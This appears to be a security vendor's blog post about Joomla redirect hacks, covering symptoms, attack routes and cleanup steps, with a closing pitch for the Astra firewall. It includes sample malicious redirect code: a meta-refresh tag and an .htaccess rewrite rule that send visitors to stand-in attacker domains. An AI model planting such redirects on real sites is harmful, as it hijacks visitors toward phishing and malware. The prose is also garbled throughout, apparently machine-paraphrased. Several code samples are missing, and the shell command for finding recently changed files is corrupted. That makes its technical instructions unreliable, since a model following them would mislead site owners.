Hack Joomla Redirect: Symptoms

It may often be difficult to detect a Joomla redirect hack. The web administrator may have been ignorant for a long time. He / She may only be notified if some users complain of ending up on the website elsewhere. Some common symptoms of malware redirecting sites compromised by Joomla are:

  • Users are redirected to domains that are unknown.
  • Fake marketing places served to the locals.
  • The site may attempt to instal malware on the device of a user.
  • For serving spam, the site may get blacklisted.
  • On the site, fake phishing pages appear. Especially on the pages for payments.
  • Multiple pop-ups may appear one after the other.

Hacked Redirect by Joomla: Examples

Redirecting Joomla ransomware leaves site administrators confused all over the world. The first response is always to take advantage of the Joomla discussion forums. And after cleanup, often the Joomla redirect hack returns again.
Hack Joomla Redirect: Triggers

Hijacking via DNS

There are some serious effects of DNS hijacking. Big enterprises such as Wikileaks have been the subjects of DNS hijacking violence. Using this process, an attacker will re-route your Joomla site ‘s full traffic. The big business, in particular, wants to keep its DNS servers secure. DNS hijacking can be performed through two channels:

Hosts File Tampering: Each device holds a Hosts.txt file of its own. This file requires hostnames to be converted into corresponding IPs. A large-scale malware attack will tamper with the computer’s host code. Instead of your Joomla web, these machines will then move them to the attacker-controlled domain. Conducting a redirection of Joomla malware.

DNS Server Attacking: DNS is a fairly old protocol, but the entire system depends on trust. Via slave and master servers, the DNS application communicates. The master transfers zones upon request to the slave servers. Basically, the DNS zones are a replica of the local database. This involves confidential machine information which may not be publicly accessible through search engines. The attacker thus sets up a rogue slave server and obtains a zone copy. The attacker attempts to attack vulnerable machines using this information and compromise the network. In addition, the attacker is then able to tamper with the local DNS server. Therefore, all requests are then forwarded to the computer managed by the intruder. Effectively executing a Joomla redirect code!

In addition, on public wifi, these attacks can also be carried out on a LAN network. A fake DNS proxy may be set up by an attacker. This will fix the IP on the attacker-controlled computer of your Joomla website. This tricks all local users into redirecting them to the fake Joomla website. Accomplishing a hack for Joomla redirect!

SQL Injection

Joomla was found vulnerable to a variety of SQLis this year alone. In one of them, the weak part was the list view of User Notes & it was dubbed CVE-2018-8045. This vulnerability made it possible for an attacker to execute SQL statements on the server. This results in the disclosure of the database ‘s critical tables. The authentication information collected from here will then influence the dashboard. The Dashboard will provide an intruder the ability to infect each file and create redirects with a Javascript code. The attackers also attempt to automate this process and then upload the scripts that execute this assignment. The attacker can inject or build new files within the existing files to insert compromised Joomla redirects. Some of the frequently generated infectious files that produce hacked redirects from Joomla are:

  • /uuc/news_id.php
  • /zkd/news_fx.php
  • /dgmq/w_news.php
  • /cisc/br-news.php

If you find any files of this nature, continue to delete them. The malicious redirect code may include each of these files. It’d look a bit like this:

<meta http-equiv="refresh" content="2; url=http://attackerDOMAIN.com/ ">.These files redirect users using the

Meta tags: Visitors are moved to AttackerDOMAIN.com. It is notable here that the Joomla site can be prone to Stacked Based SQLi at times. This provides the power to perform machine orders to the attacker. Therefore, the attacker can only corrupt the files using SQL statements with malicious redirect code!

Cross Site Scripting

XSS is a close friend of SQLi when it comes to bugs that are widely discovered. This year, Joomla discovered a whole range of XSS bugs. CVE-2018-15880, CVE-2018-12711, CVE-2018-11328, CVE-2018-11326 are all included. The most severe one among the list was CVE-2018-12711. This was triggered by a defective ‘language switcher module’. This has made it possible to infect the URLs of some languages with JS. Using XSS, an intruder, aside from rendering Joomla malware redirects, may execute other attacks such as stealing cookies.


This code here will redirect users when inserted after the insecure parameter. TomaliciousSite.com is redirected to the users and malicious scriptbad.js is loaded. Depending on the attacker’s intent, scriptbad.js will execute all manner of Javascript operations. Exploiting an XSS, apart from allowing Joomla redirect hacks, the attacker will draw victims to phishing sites.

Javascript Injection

Javascript is very efficient and is mostly used to achieve the complicated tasks. However, Joomla is vulnerable to Javascript injection due to a lack of stable coding standards, pursued by some extension developers. The Javascript injection can be used to execute modified Joomla redirects, much like XSS. You can do a heuristic test for the injection of Javascript. Your visit form would be: in the address bar of the site:

javascript:alert(‘Hello World!’);
If the site displays a message box saying ‘ Hello World! “The site is insecure, therefore. The user can exploit the web in several ways from here on. The intruder can, for instance, apply false URLs to a specific type field.


Here, this piece of code appends valuefakeDOMAIN.com to the input namedredirect01. The field will then now include a reference to the bogus site. It is notable here, though, that this attack is done on the local computer online, just like Mirrored XSS. The intruder will then have to rely on other Social Engineering strategies to trick remote users.

File .htaccess

A very efficient file that can execute several tasks is .htaccess. It is also used to build redirects, aside from avoiding a few forms of script injection attacks. In the case of the Joomla redirect hack, a code such as: will infect the.htaccess.

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteRule .* http://MaliciousDomain.tld/redirect.php?t=3 [R,L]

In this code fragment, the final line redirects the users to the malicious site. This is performed using the scriptredirect.php function. Files like index.php are also usually tainted, aside from .htacces. It leads to a large amount of web traffic as index.php is the first-page web lands on. In order to redirect full traffic, the attacker then tries to compromise index.php. In exchange, this redirected traffic allows the attacker to reap clicks.

JoomLa Redirect Hack: Fixes

DNS Server Secure

Restrict the transition of a region to the bare minimum. All slave DNS servers are predefined so that no rogue slave can request the transfer of a zone. You can do that by editing a file called thenamed.conf.local.

This piece of code predefines slave DNS servers, i.e.secundario01, allowing only trusted server zone transfers. DNS servers are often often used in attacks to exfiltrate records. This allows real time monitoring of data packets passing through DNS servers. Through handy tools such as Wireshark, this can be achieved.

Clean the Database

It becomes hard to detect when the code responsible for the Joomla redirect hack is hidden within core files. Even though all the infected files contain something common. It’s the malicious code it redirects are responsible for. You can search all such files with a single click using a database admin tool, such as PhpMyAdmin.

PhpMyAdmin comes with a search feature that makes it quick to detect. Both pages / posts containing the malicious scriptxxp:/maliciousSITE[.]com / bad.php in their code can be scanned by this application. In addition to this, the instrument can also be used for:

  • Test for, and delete, new managers.
  • Server account resetting.
  • Cleaning the tables that were infected.
  • Rolling back the modifications in case the database has been compromised by the intruder.

Advertisements by third parties

Web managers also encourage third-party advertisers on the web to generate some revenue. Some of the ad networks may not, however, abide by the book. In serving ad material, the leniency enables malicious players to insert redirect code inside the advertisements. In comparison, the other server hosts much of the malware scripts, which further complicates the matter. Try stopping the ads again and again if infection reoccurs after washing. If the Joomla redirect hack ends, so it was presumably due to the site’s malicious advertising. Contact the ad network, then, and fix the issue.

Additional Precautions

  • Updates provide key updates for vulnerabilities that can be checked from the changelog. Update periodically to keep Joomla secure, then.
  • Uses just reputed plugins. Avoid using extensions which are null or incorrectly written. Keep the extensions current too, aside from main data.
  • The likelihood of a brute force attack can be reduced by protected passwords.
  • Secure the server ‘s file authorization. Ensure that files such as .htaccessis are set to444 (r-r-r-) or440 (r-r-). authorization.
  • Login via SSH in case you suspect a file change. Perform the following command on the terminal: find /path-of-www -format f -printf ‘percent TY- percent Tm- percent Td percent TT percent pn’ | sort -r. A collection of files updated according to their respective timestamps will be the output received. Inspect the files manually from here on. Check on the ambiguous code lines using the ‘#’ character. Consult the experts for an assessment of the file after that!


It is necessary to ensure that the hack that Joomla redirects does not recur. Hackers could, however, be continuously attacking the web. The most powerful security strategy in such a situation is to use a firewall. It’s very simple and comfortable to add a firewall. Today’s accessible protection tools on the market are conveniently scalable. Like the one at Astra, which is suitable for both small blogs and large shopping pages. Moreover, if any file is changed, Astra notifies the users via email.


When it comes to blocking Joomla malware redirections, Astra has a strong track record. The packet filtering implemented by Astra also means that your site is not impacted by any bad request by the attackers. In addition, Astra performs a security analysis of the Joomla website and notifies you if any flaw has been found. This will keep you one step ahead of the attackers. Astra is strongly recommended to block Joomla redirect hack, a seamless amalgamation of human help and automation.